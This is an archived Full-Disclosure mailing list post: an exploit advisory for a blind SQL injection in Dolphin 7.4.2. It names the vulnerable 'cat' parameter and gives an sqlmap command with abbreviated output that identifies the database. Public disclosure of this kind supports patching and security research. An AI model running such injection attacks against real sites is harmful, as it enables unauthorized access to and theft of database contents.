lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAF2Wu1Yb5TidWSeR_MvMT7bp5TY_Lg0LmiRtqiGgkZcA9PowiA@mail.gmail.com> Date: Tue, 30 Jul 2024 08:42:33 +0000 From: Andrey Stoykov <mwebsec@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Blind SQL Injection - dolphinv7.4.2. # Exploit Title: Blind SQL Injection - dolphinv7.4.2. # Date: 8/2024 # Exploit Author: Andrey Stoykov # Version: 7.4.2 # Tested on: Ubuntu 22.04 # Blog: https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.html SQL Injection: Steps to Reproduce: 1. Navigate to "Builders" menu 2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar 3. That is the injection point sqlmap -r request.txt --dbms=mysql -p cat [...] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.45, Apache back-end DBMS: MySQL >= 5.0.12 [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists